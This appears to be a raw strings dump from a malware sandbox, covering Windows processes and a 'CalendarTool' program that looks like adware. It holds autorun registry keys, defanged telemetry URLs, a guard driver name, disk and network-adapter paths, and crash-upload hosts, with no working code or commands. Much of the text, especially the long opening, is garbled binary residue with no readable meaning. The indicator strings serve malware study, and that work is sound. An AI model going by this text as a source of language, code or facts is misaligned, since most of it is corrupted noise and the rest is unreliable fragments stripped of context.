|= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |= |=
DDDDE%CTDD@
DDDDE%CTDD@
A%US$
A%US$
%UUUU
%UUUU
%%UUU
%%UUU
33U
33U
""2222!!
""2222!!
!"!"%UUR""
!"!"%UUR""
!""!"#2"""
!""!"#2"""
"!!"#3"!"
"!!"#3"!"
dnnnnn:n.nfCnmddddd
dnnnnn:n.nfCnmddddd
////;/;;88
////;/;;88
;888;;!/
;888;;!/
!//!!;;^
!//!!;;^
:;:!::!!!
:;:!::!!!
.88.88.8
.88.88.8
.N.NN.M
.N.NN.M
::8.8...
::8.8...
:::!;;:!
:::!;;:!
//!!;888
//!!;888
.8.8.88...
.8.8.88...
:;!::!!;!//!;
:;!::!!;!//!;
!!;:!!::
!!;:!!::
.88..8..
.88..8..
!!:::/^!
!!:::/^!
!;/;!;;;!!!:
!;/;!;;;!!!:
.8:!!!!^
.8:!!!!^
!!:;:::..
!!:;:::..
/:!^^!;{8{../
/:!^^!;{8{../
...:::.-
...:::.-
**6***66*6**6566*5666 ,
**6***66*6**6566*5666 ,
6*6666*6*6 655*65
6*6666*6*6 655*65
6*65 56*5 55 555 *5 6
6*65 56*5 55 555 *5 6
555( 55 (5 5(
555( 55 (5 5(
76 5 66 555*677
76 5 66 555*677
6*6 5 5(5 (55( '5((5 (556 ('5
6*6 5 5(5 (55( '5((5 (556 ('5
665**6(('S((((((S(((]('((@('SS((S(((((((6C-.NEC66S5sU
665**6(('S((((((S(((]('((@('SS((S(((((((6C-.NEC66S5sU
555(555(5((5(5(5(
555(555(5((5(5(5(
5 5 5 5555 (555(555'(((5(5('55(((
5 5 5 5555 (555(555'(((5(5('55(((
((''('5'5(5('('('('('((''('(((@(((('&(((&
((''('5'5(5('('('('('((''('(((@(((('&(((&
%&&%&&&&3>&3&3&33&3&3333&&3>3333
%&&%&&&&3>&3&3&33&3&3333&&3>3333
'(3&'&3&
'(3&'&3&
3&33&&((
3&33&&((
3323>33>%>3%>3>33>3%3&%
3323>33>%>3%>3>33>3%3&%
*5'(('((&@3(
*5'(('((&@3(
,63%3>323>3%>&>33323>>%>
,63%3>323>3%>&>33323>>%>
3(3'(((@@'5('@(@(&('(
3(3'(((@@'5('@(@(&('(
>2>323%>3
>2>323%>3
75((((@3&333&3&&&%&3&&3&33>33%3>23%>3
75((((@3&333&3&&&%&3&&3&33>33%3>23%>3
>2%$32%>2>%>2$3>
>2%$32%>2>%>2$3>
3&%&&3&33>3>33
3&%&&3&33>3>33
3>%>3%&3$23>23$2>2%$>2>
3>%>3%&3$23>23$2>2%$>2>
)4433((&(&('*
)4433((&(&('*
('((((''(**6(('' *
('((((''(**6(('' *
32323>3>
32323>3>
2$%>22%>%3' (
2$%>22%>%3' (
&(&''((5(5 *
&(&''((5(5 *
'(&(&((&('''
'(&(&((&('''
&&%&3&&%3%
&&%&3&&%3%
2%>22>22
2%>22>22
5''3(((3(('&(&'&
5''3(((3(('&(&'&
3%%3%3%2#$
3%%3%3%2#$
22$22$2%$22$2%2%$2%$2$222%$22
22$22$2%$22$2%2%$2%$2$222%$22
&>2$2$2$222$22$%%
&>2$2$2$222$22$%%
:7'((('(3('(3(&(&
:7'((('(3('(3(&(&
222222222222
222222222222
22222222222222
22222222222222
222222222222222
222222222222222
22$22$22$22$
22$22$22$22$
&(%3%&&&&3&&&3%3
&(%3%&&&&3&&&3%3
222222222222222222
222222222222222222
&&(&3(&(&'('((3'(&&
&&(&3(&(&'('((3'(&&
2222222
2222222
22$
22$
&&(3(3('(&'
&&(3(3('(&'
222"2212
222"2212
22
22
(&(3(3((
(&(3(3((
((565 ((( 6
((565 ((( 6
333&33(&&
333&33(&&
'(('('(('(
'(('('(('(
'&%%"$
'&%%"$
2"2"22"2
2"2"22"2
2222
2222
"2"22
"2"22
2%('(3'32222?&'
2%('(3'32222?&'
2"2"2"121212
2"2"2"121212
2"2"2$"?
2"2"2$"?
%%22%2
%%22%2
&3(3(3((&
&3(3(3((&
"2"
"2"
1"?((&21
1"?((&21
22
22
2%""22&&
2%""22&&
2
2
'&('(3(''
'&('(3(''
((%%%"
((%%%"
5(3%"%
5(3%"%
"2%5*67
"2%5*67
))) ))))
))) ))))
""**
""**
"*
"*
#2#---2222-222442-
#2#---2222-222442-
---(-%
---(-%
$/222(--444222!
$/222(--444222!
#&-221269924999;
#&-221269924999;
&$-22-($2%
&$-22-($2%
#(2---222622212-
#(2---222622212-
#2221299629968
#2221299629968
#&--%#(2##!
#&--%#(2##!
-222422422426662-%
-222422422426662-%
"2-##&
"2-##&
!##-#-&%---#---#&-219662%
!##-#-&%---#---#&-219662%
$&-(151,44.9
$&-(151,44.9
&1242662-
&1242662-
-(..19.19
-(..19.19
,4492.12
,4492.12
12-$-,-,
12-$-,-,
-, $$----
-, $$----
#%#-15/-&
#%#-15/-&
-,(,,(,(,
-,(,,(,(,
$$11651566/,$&&
$$11651566/,$&&
,2592&&&-
,2592&&&-
2466/!$$
2466/!$$
""*
""*
) '????[
) '????[
&&&$-556>>61,,5994511-
&&&$-556>>61,,5994511-
$(//$$$(6>6/,$,-$
$(//$$$(6>6/,$,-$
#$-22692/,,$,-&
#$-22692/,,$,-&
-266661..4514#
-266661..4514#
&,2-&#
&,2-&#
&-222,22--#
&-222,22--#
#&&---2-,-&$&(,,291.566..BNNNTNNNNNAABIAA88
#&&---2-,-&$&(,,291.566..BNNNTNNNNNAABIAA88
&!#&!-##
&!#&!-##
--//11468>885882&
--//11468>885882&
$266961$&--$&%
$266961$&--$&%
,1661,!-((#
,1661,!-((#
&$,4255$,92
&$,4255$,92
&$,44..&
&$,44..&
""**""***""
""**""***""
"****
"****
"**""""*""""
"**""""*""""
&-569./-,16522$
&-569./-,16522$
.BAA=86546888=AAAEAAEMNRMQQSWZZ\]gk__m__\
.BAA=86546888=AAAEAAEMNRMQQSWZZ\]gk__m__\
bTRHHHHHQQHQJQWJSSSSSSSSSSSSSSSSWWSSSS\\V]VZW8,.FW]\\]\]\]\\ZZ\\WFR>38(
bTRHHHHHQQHQJQWJSSSSSSSSSSSSSSSSWWSSSS\\V]VZW8,.FW]\\]\]\]\\ZZ\\WFR>38(
.BTTkgn]ktvgmvvvvvmvvvsvzzzyzyzyzyyyzmkkkkkZSRA816;F87
.BTTkgn]ktvgmvvvvvmvvvsvzzzyzyzyzyyyzmkkkkkZSRA816;F87
yzyzyzym^Z]WN3 $&$.Wt\
yzyzyzym^Z]WN3 $&$.Wt\
""*"""****""""
""*"""****""""
"***"**""**
"***"**""**
$5612,.2,
$5612,.2,
&$$,,,5]
&$$,,,5]
$]t.Ft
$]t.Ft
7%8U8
7%8U8
3 303
3 303
2
8 8$8(8,80848885%5,575{67 7$7(7,70747rundll32.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\AdvancedSOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPageSoftware\Microsoft\Windows\CurrentVersion\Explorer\Advanced::{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}::{2559a1f2-21d7-11d4-bdaf-00c04f60b9f0}::{2559a1f3-21d7-11d4-bdaf-00c04f60b9f0}::{2559a1f0-21d7-11d4-bdaf-00c04f60b9f0}::{2559a1f1-21d7-11d4-bdaf-00c04f60b9f0}::{D20EA4E1-3957-11d2-A40B-0C5020524153}::{2559a1f7-21d7-11d4-bdaf-00c04f60b9f0}{208D2C60-3AEA-1069-A2D7-08002B30309D}{20D04FE0-3AEA-1069-A2D8-08002B30309D}Software\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Favorites{450D8FBA-AD25-11D0-98A8-0800361B1103}CLSID\{2559a1f6-21d7-11d4-bdaf-00c04f60b9f0}Software\Microsoft\Windows\CurrentVersion\RunOnceSoftware\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoadSoftware\Microsoft\Windows\CurrentVersion\Explorer\DontShowMeThisDialogAgainSoftware\Microsoft\Windows\CurrentVersion\Explorer\Desktop\CleanupWiz\\.\WMIDataDeviceSoftware\Microsoft\Windows\CurrentVersion\RunSoftware\Microsoft\Windows\CurrentVersion\Policies\Explorer\RunSoftware\Microsoft\Windows NT\CurrentVersion\WindowsExplorerIsShellMutexdesk.cplSoftware\Microsoft\Windows\CurrentVersion\Explorertourstart.exetourstart.exe,0Microsoft.OfferTourWINWORD.EXESoftware\Microsoft\Windows\CurrentVersion\AppletsSoftware\Microsoft\Windows\CurrentVersion\Applets\Tourexplorer.exe,9Microsoft.FixScreenResolutionshell:::{2559a1f4-21d7-11d4-bdaf-00c04f60b9f0}Software\Microsoft\Windows\CurrentVersion\Explorer\FileAssociationSoftware\Microsoft\Windows NT\CurrentVersionshell:::{2559a1f5-21d7-11d4-bdaf-00c04f60b9f0}Software\Microsoft\Windows\CurrentVersion\Explorer\StartPageSoftware\Microsoft\Windows\CurrentVersion\Policies\ExplorerDDEEXECUTESHORTCIRCUIThttp\shellIEXPLORE.EXESoftware\Microsoft\Windows\CurrentVersion\Explorer\Streams\DesktopSoftware\Microsoft\Windows\CurrentVersion\RunOnceExcomctl32.dllSoftware\Microsoft\Windows\Internet SettingsAutoConfigURLsystem.iniAppEvents\Schemes\Apps\.Default\%s\.currentSoftware\Microsoft\Windows\CurrentVersion\Explorer\TrayNotifyMSShellRunDlgReadyres://mys.dll/mys.hta /explorermshta.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Setup\WelcomeSoftware\Microsoft\Windows\CurrentVersion\Explorer\TipsSOFTWARE\Policies\Microsoft\Windows NT\CurrentVersion\MYScys.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\srvWizinstall.exeSOFTWARE\Microsoft\Windows\CurrentVersion\Control PanelOUTLOOK.EXEexplorer.exe,16iernonce.dllWININET.DLLUpdateURLWindowsUpdateHWND%xSoftware\Microsoft\Windows\CurrentVersion\OemStartMenuDatafldrclnr.dll,Wizard_RunDLLiexplore.exewinbrand.dllSoftware\Microsoft\Windows\CurrentVersion\Explorer\Remote\%dshell32.dllnusrmgr.cpl ,initialTask=ChangePictureNewExeNameWindowsediskeer.dlltimedate.cplSoftware\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\LastVisitedMRUSoftware\Microsoft\Windows\CurrentVersion\Explorer\Comdlg32\OpenSaveMRUSoftware\Microsoft\Windows\CurrentVersion\Explorer\Doc Find Spec MRUSoftware\Microsoft\Windows\CurrentVersion\Explorer\RunMRUSoftware\Microsoft\Internet Explorer\TypedURLs%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Calculator.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Games\Solitaire.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Paint.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\WordPad.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\System Tools\Files and Settings Transfer Wizard.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Windows Movie Maker.lnk%USERPROFILE%\Start Menu\Programs\Accessories\Tour Windows XP.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Windows Messenger.lnk%USERPROFILE%\Start Menu\Programs\Windows Media Player.lnk%ALLUSERSPROFILE%\Start Menu\Programs\MSN.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Get Online with MSN.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Get Going with Tablet PC.lnk%ALLUSERSPROFILE%\Start Menu\Set Program Access and Defaults.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Windows Journal.lnk%ALLUSERSPROFILE%\Start Menu\Programs\Accessories\Media Center\Media Center.lnk%USERPROFILE%\Start Menu\Programs\Internet Explorer.lnkSoftware\Microsoft\Windows\CurrentVersion\Explorer\HideDesktopIcons\NewStartPanelTSAppCMP.DLLnetapi32.dll%SystemRoot%\system32\restore\rstrui.exeRunDLL32.EXE Shell32.DLL,ShellExec_RunDLL ?0x%X?%sRunDLL32.EXE%s%d%sSoftware\Microsoft\Windows\CurrentVersion\Policies\Systemsettings.dllexplorer.exe "explorer.exe /e, "WindowsLogonWindowsLogoff%s %sSoftware\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\CountuAppWiz.Cpl\explorer.exeSoftware\Microsoft\Windows\CurrentVersion\Explorer\MenuOrder\Start Menu::{20D04FE0-3AEA-1069-A2D8-08002B30309D}taskmgr.exeShellExecuteSoftware\Microsoft\Windows\CurrentVersion\Explorer\AppKey\%d\WindowsShell.ManifestGet Online with MSN.lnkSet Program Access and Defaults.lnkLink%dOEM%dSoftware\Microsoft\Windows\CurrentVersion\SMDEn::{D20EA4E1-3957-11d2-A40B-0C5020524152}%WinDir%\Explorer.exeThere is a file or folder on your computer called "%s" which could cause certain applications to not function correctly. Renaming it to "%s" would solve this problem. Would you like to rename it now?Ca&scade WindowsTile Windows &HorizontallyTile Windows V&ertically&Windows Security...&Help and Support&Log Off %s...Windows Explorer6.00.2900.5512 (xpsp.080413-2105)EXPLORER.EXEWindowsOperating System6.00.2900.5512Keep the &taskbar on top of other windowsTo remove records of recently accessed documents, programs, and Web sites, click Clear.Windows displays icons for active and urgent notifications, and hides inactive ones. You can change this behavior for items in the list below.Select this option to use the menu style from earlier versions of Windows.6There is not enough memory to complete this operation.8Unable to run command.The folder '%1' has been removed.WMy Computer or Windows Explorer has not been properly initialized yet. Try again later.&Undo %sWindows is running in safe mode.This special diagnostic mode of Windows enables you to fix a problem which may be caused by your network or hardware settings. Make sure these settings are correct in Control Panel, and then try starting Windows again. While in safe mode, some of your devices may not be available.startRThere was an internal error and one of the windows you were using has been closed.Restrictions{This operation has been cancelled due to restrictions in effect on this computer. Please contact your system administrator.&Show Open WindowsWindows was unable to change the display settings for the new configuration. Return the computer to the previous state, shut down Windows, and restart the computer in the desired configuration.There may be a problem with your display settings if you continue. To safely change to a new configuration, you should shut down Windows and restart the computer in the desired configuration. Do you want to continue anyway?This pre-release version of "Internet Explorer 4.0" Desktop/Explorer has expired. Please update to the latest release of "Internet Explorer 4.0" from WWW.MICROSOFT.COMhelpctr.exe>-FromStartHelpTake a tour of Windows XPNOpens a window where you can pick search options and work with search results.aOpens a central location for Help topics, tutorials, troubleshooting, and other support services./Opens a program, folder, document, or Web site.Provides options for closing your programs and logging off, or for leaving your programs running and switching to another user.lProvides options for turning off or restarting your computer, or for activating Stand By or Hibernate modes.RDisconnects your session. You can reconnect to the session when you log on again.&Windows SecurityiOpens the My Documents folder, where you can store letters, reports, notes, and other kinds of documents./Displays recently opened documents and folders.KOpens the My Music folder, where you can store music and other audio files.]Opens the My Pictures folder, where you can store digital photos, images, and graphics files.zGives access to, and information about, the disk drives, cameras, scanners, and other hardware connected to your computer.MGives access to, and information about, folders and files on other computers.8Connects to other computers, networks, and the Internet.rundll32.exe_1976:.text`.data.rsrcmsvcrt.dllKERNEL32.dllNTDLL.DLLGDI32.dllUSER32.dllIMAGEHLP.dllrundll32.pdb.....eZXnnnnnnnnnnnn3....eDXnnnnnnnnnnnn3...eDXnnnnnnnnnnnn,.eDXnnnnnnnnnnnn,%Xnnnnnnnnnnnnnnn1O3$dS7"%U9.manifest5.1.2600.5512 (xpsp.080413-2105)RUNDLL.EXEWindowsOperating System5.1.2600.5512YThere is not enough memory to run the file %s.Please close other windows and try again.9The file %s or one of its components could not be opened.0The file %s or one of its components cannot run.MThe file %s or one of its components requires a different version of Windows.UThe file %s or one of its components cannot run in standard or enhanced mode Windows.3Another instance of the file %s is already running./An exception occurred while trying to run "%s"Error in %sMissing entry:%sError loading %sCalendarServ.exe_3180:.text`.rdata@.data.rsrc@.relocProduct_CloudMgr_Public_ExeProduct_CloudMgr_ExeProduct_AppsRobo_Public_ExeProduct_AppsRobo_ExeProduct_Allinone_Public_ExeProduct_Allinone_ExeProduct_Newspark_Public_ExeProduct_Newspark_ExeProduct_Spark_Public_ExeProduct_Spark_ExeProduct_Ime_Public_ExeProduct_Ime_ExeProduct_AppStore_Public_ExeProduct_AppStore_ExeProduct_Pcf_Public_ExeProduct_Pcf_ExeProduct_Bav_Public_ExeProduct_Bav_ExeADVAPI32.DLLPlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loadedoperatorGetProcessWindowStationUSER32.DLLD:\jenkins\workspace\calendar\Release\Service.pdbSHLWAPI.dllGetProcessHeapKERNEL32.dllRegCloseKeyRegOpenKeyExWRegCreateKeyWRegEnumKeyWReportEventWADVAPI32.dllSHELL32.dllWTSAPI32.dllUSERENV.dllVERSION.dllGetCPInfoGetConsoleOutputCPRegCreateKeyExWPSAPI.DLL.?AV?$CSafeSingleton@VBugReportHelper@@@@.?AVCHeapMemAlloc@BugReportHelper@@.?AVBugReportHelper@@2"2S2_21$1(1,1014181,2024282@ntdll.dllkernel32.dllDumpConfig.iniBugInfoUploadURLBugURL\StringFileInfo\x\%s\StringFileInfo\XKERNEL32.DLLmscoree.dllAEVPTask.dllbtguarduser.dllReport.exeInstallHelper.exeDeskBandDLL.dllbtguard.sysbtguard64.sys123.exeSoftware\Microsoft\Windows\CurrentVersion\Uninstall\{D9BAB2C9-5236-48c3-AF02-67E799F09BBD}rundll32.exe, LogReport noKernel32.dllexplorer.exe%s failed with %dCalendar.exeCrashReport.exeCrashUL.exe2.0.0.11189dump.theadvancedcalendar.comBugReportConfig.iniBugReportConfig5.1.2600.5512 (xpsp.080413-211CalendarServ.exe"%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe"%Program Files%\CalendarTool\2.0.0.11189%Documents and Settings%\LocalService\Application Data\CalendarTool\dump%Program Files%\CalendarTool\2.0.0.11189\CalendarServ.exe2,0,0,11189Calendar.exe_3428:.text`.rdata@.data.rsrc@.reloc8%uEP3>.uBVtcHHtCHt.HtvSSShFTPjKFtPj;C.PjRVtGHt.Ht&inflate 1.1.3 Copyright 1995-1998 Mark Adler1.2.24libjpeg error %d from %s [%d %d]sampler.begin--- SkMatrix::setPolyToPoly count out of range %d1.2.30123456789ABCDEFlibpng error: %slibpng error: %s, offset=%dlibpng error no. %s: %slibpng warning: %slibpng warning no. %s: %sNULL row buffer for row %ld, pass %diTXt chunk not supported.Corrupt JPEG data: found marker 0xx instead of RST%dWarning: unknown JFIF revision number %d.dCorrupt JPEG data: %u extraneous bytes before marker 0xxInconsistent progression sequence for component %d coefficient %dUnknown Adobe color transform code %dObtained XMS handle %uFreed XMS handle %uUnrecognized component IDs %d %d %d, assuming YCbCrJFIF extension marker: RGB thumbnail image, length %uJFIF extension marker: palette thumbnail image, length %uJFIF extension marker: JPEG-compressed thumbnail image, length %uOpened temporary file %sClosed temporary file %sSs=%d, Se=%d, Ah=%d, Al=%dComponent %d: dc=%d ac=%dStart Of Scan: %d componentsComponent %d: %dhx%dv q=%dStart Of Frame 0xx: width=%u, height=%u, components=%dSmoothing not supported with nonstandard sampling ratiosRST%dAt marker 0xx, recovery action %dSelected %d colors for quantizationQuantizing to %d colorsQuantizing to %d = %d*%d*%d colors%4u %4u %4u %4u %4u %4u %4u %4uUnexpected marker 0xxMiscellaneous marker 0xx, length %uwith %d x %d thumbnail imageJFIF extension marker: type 0xx, length %uWarning: thumbnail image size does not match data length %uJFIF APP0 marker: version %d.d, density %dx%d %d= = = = = = = =Obtained EMS handle %uFreed EMS handle %uDefine Restart Interval %uDefine Quantization Table %d precision %dDefine Huffman Table 0xxDefine Arithmetic Table 0xx: 0xxUnknown APP14 marker (not Adobe), length %uUnknown APP0 marker (not JFIF), length %uAdobe APP14 marker: version %d, flags 0xx 0xx, transform %dUnsupported marker type 0xxFailed to create temporary file %sUnsupported JPEG process: SOF type 0xxCannot quantize to more than %d colorsCannot quantize to fewer than %d colorsCannot quantize more than %d color componentsInsufficient memory (case %d)Not a JPEG file: starts with 0xx 0xxQuantization table 0xx was not definedHuffman table 0xx was not definedBacking store not supportedCannot transcode due to multiple use of quantization table %dMaximum supported image dimension is %u pixelsEmpty JPEG image (DNL not supported)Bogus DQT index %dBogus DHT index %dBogus DAC value 0x%xBogus DAC index %dUnsupported color conversion requestToo many color components: %d, max %dBuffer passed to JPEG library is too smallJPEG parameter struct mismatch: library thinks size is %u, caller expects %uImproper call to JPEG library in state %dInvalid scan script at entry %dInvalid progressive parameters at scan script entry %dInvalid progressive parameters Ss=%d Se=%d Ah=%d Al=%dUnsupported JPEG data precision %dInvalid memory pool code %dWrong JPEG library version: library is %d, caller expects %dIDCT output block size %d not supportedInvalid component ID %d in SOSBogus message code %d?I got %f and %f as radii to SkPath::AddRoundRect, but negative radii are not allowed.Unknown zTXt compression type %dIncomplete compressed datastream in %s chunkData error in compressed datastream in %s chunkBuffer error in compressed datastream in %s chunkgamma = (%d/100000)gx=%f, gy=%f, bx=%f, by=%fwx=%f, wy=%f, rx=%f, ry=%fincorrect gamma=(%d/100000)Unknown compression type %dzero length keywordkeyword length must be 1 - 79 charactersZero length keywordextra interior spaces removed from keywordleading spaces removed from keywordtrailing spaces removed from keywordinvalid keyword character 0xXOut of memory while procesing keywordEmpty keyword in tEXt chunkEmpty keyword in zTXt chunkEmpty keyword in iCCP chunkEmpty keyword in sPLT chunkwhite_x=%f, white_y=%fdeflate 1.2.3 Copyright 1995-2005 Jean-loup Gailly%ld%c"@Skia Error: %sInvalid Operationinflate 1.2.3 Copyright 1995-2005 Mark Adler====== typeface index %d%s empty contour?%s shouldn't get here if all four points are about equal%s shouldn't get here if all four points are about equalSorry, you passed me a bitmap resize method I have never heard of: %d?456789:;!"#$%&'()* ,-./0123kernel32.dllProduct_CloudMgr_Public_ExeProduct_CloudMgr_ExeProduct_AppsRobo_Public_ExeProduct_AppsRobo_ExeProduct_Allinone_Public_ExeProduct_Allinone_ExeProduct_Newspark_Public_ExeProduct_Newspark_ExeProduct_Spark_Public_ExeProduct_Spark_ExeProduct_Ime_Public_ExeProduct_Ime_ExeProduct_AppStore_Public_ExeProduct_AppStore_ExeProduct_Pcf_Public_ExeProduct_Pcf_ExeProduct_Bav_Public_ExeProduct_Bav_ExePlease contact the application's support team for more information.- Attempt to initialize the CRT more than once.- CRT not initialized- floating point support not loaded?#%X.yoperatorGetProcessWindowStationUSER32.DLLportuguese-brazilianRegDeleteKeyExWSYN.ACKACK.SYN
XXX
D:\jenkins\workspace\calendar\Release\calendar.pdb
CalendarEntry.dll
USP10.dll
KERNEL32.dll
EnumThreadWindows
USER32.dll
GDI32.dll
RegCloseKey
RegOpenKeyExW
RegNotifyChangeKeyValue
RegCreateKeyExW
RegDeleteKeyW
RegQueryInfoKeyW
RegEnumKeyExW
ADVAPI32.dll
ShellExecuteExW
SHELL32.dll
ole32.dll
OLEAUT32.dll
SHLWAPI.dll
GdiplusShutdown
gdiplus.dll
PSAPI.DLL
WinHttpCloseHandle
WinHttpReadData
WinHttpQueryDataAvailable
WinHttpQueryHeaders
WinHttpReceiveResponse
WinHttpWriteData
WinHttpSetOption
WinHttpSendRequest
WinHttpGetProxyForUrl
WinHttpGetIEProxyConfigForCurrentUser
WinHttpAddRequestHeaders
WinHttpOpenRequest
WinHttpConnect
WinHttpCrackUrl
WinHttpSetTimeouts
WinHttpOpen
WINHTTP.dll
COMCTL32.dll
IMM32.dll
IPHLPAPI.DLL
VERSION.dll
GetProcessHeap
SetNamedPipeHandleState
TransactNamedPipe
WaitNamedPipeW
GetCPInfo
GetConsoleOutputCP
SHFileOperationW
ShellExecuteW
USERENV.dll
WTSAPI32.dll
.?AVKeyboardEventArgs@@
.?AV?$CSafeSingleton@VBugReportHelper@@@@
.?AVCHeapMemAlloc@BugReportHelper@@
.?AVBugReportHelper@@
zcÃ
.?AVReportNoInTimeBufferTask@statistics@@
.?AVReportNoInTimeFileTask@statistics@@
.?AVReportImpl@statistics@@
.?AVIDataReport@statistics@@
.?AVCMD5Checksum@@
$iTXtXML:com.adobe.xmp
" id="W5M0MpCehiHzreSzNTczkc9d"?> U
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?>
BF.mkQl
%f_#J
" id="W5M0MpCehiHzreSzNTczkc9d"?>
i\^ `.er
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> Z
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> @
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> 4
" id="W5M0MpCehiHzreSzNTczkc9d"?>
" id="W5M0MpCehiHzreSzNTczkc9d"?> a
" id="W5M0MpCehiHzreSzNTczkc9d"?>
6"6&6*6.62666=6
0!00u0}0
8 9$9(9,9094989> >&> >:>3-373N3X3s3}39#9'9 9/9396l61!101:1@12$3(3,303437$9(9,9094989=&?-?8???0 0$0(0,000409#=2=#>2>7.84888: :$:(:,:0:4:8:8 ?$?(?,?0?4?8 8(8,80848; ;(;0;9@9\9`9|92$2,2024282Floating point (%%e, %%f, %%g, and %%G) is not supported by the WTL::CString class.uisys\uilog_%d.log%s resource id('%s') duplicatebSendHoverMsgbPassword\skin.xmlG_DIRECTUI_RECYCLE_OBJ_MSGG_DIRECTUI_CLEAR_OBJ_MSGwSubclassLayeredWindow[%ld],Title:%s
d:d:d d-d-d
[%d]%s -> %s
W%d %d %d %d %d %d %d
%f %f %f %f %d %d %d
%d %d %d %d
%d %d
%s %d %d
%d %d %d %d %s %x %d
%d:%d
DumpConfig.ini
BugInfoUploadURL
BugURL
\StringFileInfo\x\%s
\StringFileInfo\X
mscoree.dll
KERNEL32.DLL
{421DADC9-79C8-4211-82AD-D62013B970A7}
ntdll.dll
%d.%d
okernel32.dll
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_uu.cgi
2.0.0.11189
hXXp://VVV.theadvancedcalendar.com/cgi-bin-py/calendar_statistic.cgi
CrashReport.exe
CrashUL.exe
dump.theadvancedcalendar.com
BugReportConfig.ini
BugReportConfig
@WinHttpClient
Language.json
%sConfig%d\%s
%s%s%s
rhXXp://ime.baidu.jp/type/api/horoscope.php
hXXp://horoscopovirtual.bol.uol.com.br/horoscopo/xml-geradores/baidu/
hXXp://horoscope.mthai.com/feed-baidu.php
%s\%d.json
%d/%d/%d
d-d-d
%d.%d.%d
%[^;]; charset=%s
Festival_special.json
Config%d\%s
Config%d
Festival.json
Config%d\
%s\FestivalPicture\%s
%d-%d~%d
%d-%d
%d-%d-%d
Shell32.dll,Control_RunDLL "timedate.cpl"
rundll32.exe
config.json
AHKEY_CURRENT_CONFIG
HKEY_DYN_DATA
HKEY_PERFORMANCE_DATA
HKEY_USERS
HKEY_LOCAL_MACHINE
HKEY_CURRENT_USER
HKEY_CLASSES_ROOT
AAdvapi32.dll
Constellation_%s_layer
Constellation_%sValue%d
Constellation_%s0Value%d
Constellation_%sHalfValue%d
constellation_icon_%s_style
constellation_icon_%s0_style
constellation_icon_%shalf_style
head.default
%s %d
%s de %d
%s,%d
Tahoma.14.bold
1.2 1 0 0 55 255 0
0 1 0 0 55 255 0
%s d
%s%d %s
d:d:d
%s%d%s
1.0 0.1 0 0 255 55 4
1.0 0 0 0 255 55 4
1 1.2 0 0 255 55 4
Aexplorer.exe
report_thread_cs.wuyg
statistics::ReportImpl::~ReportImpl
1.0.0.1
statistics::ReportImpl::SerializeAllNoIntime
statistics::ReportImpl::WriteToNoIntimeFile
%s, no in time file, %s
%dddddd
%s out errir, upload inproc, %s
%s begin
%s end
%d.d.d-d:d:d
C:\08D88547-FF9F-4953-B96D-7B2B491E219E
%s_%d%s
XXxXXXXXXXX
\%d%d%0x
%s, record mix, old= %d, new= %d
%s, error, no call begin, threadid = %d
%s, in time file : %s
%s, error no begin threadid=%d
statistics::ReportNoInTimeFileTask::RunThreadTask
%s, error no nointime data
statistics::ReportNoInTimeBufferTask::RunThreadTask
%s, post fail, %s
%s, can del %s
%s, not can del %s
%s, error start %s
%s, setevent, outproc %s
\Guid\Common\I18N\conf.db
2\*.*
statistics::WinHttpPostMime::PostBuffer
%s file data empty
%s crackurl fail, %s
HTTP/1.1
\\.\pipe\I18NStat\c_s_w_u_y_g
SYSTEM\CurrentControlSet\Control\Class\{4D36E972-E325-11CE-BFC1-08002BE10318}
SYSTEM\CurrentControlSet\Control\Network\{4D36E972-E325-11CE-BFC1-08002BE10318}
\\.\PhysicalDrive%d
\\.\Scsi%d:
127.0.0.1
http=
https=
5.1.2600.5512 (xpsp.080413-211
Calendar.exe
"%Program Files%\CalendarTool\2.0.0.11189\Calendar.exe" from_service
%Program Files%\CalendarTool\2.0.0.11189
